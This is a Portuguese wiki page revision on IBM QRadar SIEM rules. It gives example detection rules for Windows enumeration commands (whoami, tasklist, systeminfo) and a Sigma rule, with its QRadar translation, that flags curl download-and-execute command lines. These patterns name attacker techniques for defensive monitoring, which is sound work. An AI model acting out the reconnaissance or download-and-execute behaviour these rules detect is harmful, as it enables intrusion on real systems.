Revision as of 19:00, 19 January 2025

Uma Rule (regra) é um grupo de testes que podem desencadear uma ação se condições específicas forem atendidas.

Artigos

Everything you need to know about QRadar Rules (for beginners and experts)

(Github) Sigma - Generic Signature Format for SIEM Systems

Exemplos

Rule	Description
Apply Potential Windows Enumeration Detected and when an event matches any of the following BB: Windows Endpoint Events and when the event matches Event ID is any of 4688 and when the event matches Command (custom) any of [whoami or tasklist or system info] and NOT when the source OP is on of the following IP addresses	Comandos que hackers pegam informações em servidores MS Windows
.	.
.	.

Exemplo: (Github) Sigma - Curl Download And Execute Combination

(Github) Sigma - Curl Download And Execute Combination

selection:
  CommandLine|contains|windash: ' -c '
  CommandLine|contains|all:
    - 'curl '
    - 'http'
    - '-o'
    - '&'
condition: selection

And in IBM QRadar Rule:

Apply Potential Windows Enumeration Detected

and when an event matches any of the following BB: Windows Endpoint Events

and when the event matches Event ID is any of 4688

and when the event matches Command (custom) any of [/c or curl or http or -o or &]

Ver também

@@ Line 40: / Line 40: @@
   condition: selection
+And in IBM QRadar Rule:
+ Apply '''Potential Windows Enumeration Detected'''</br>
+ '''and''' when an event matches '''any''' of the following '''BB: Windows Endpoint Events'''</br>
+ '''and''' when the event matches '''Event ID is any of 4688'''</br>
+ '''and''' when the event matches '''Command (custom) any of [/c or curl or http or -o or &]'''</br>
 = Ver também =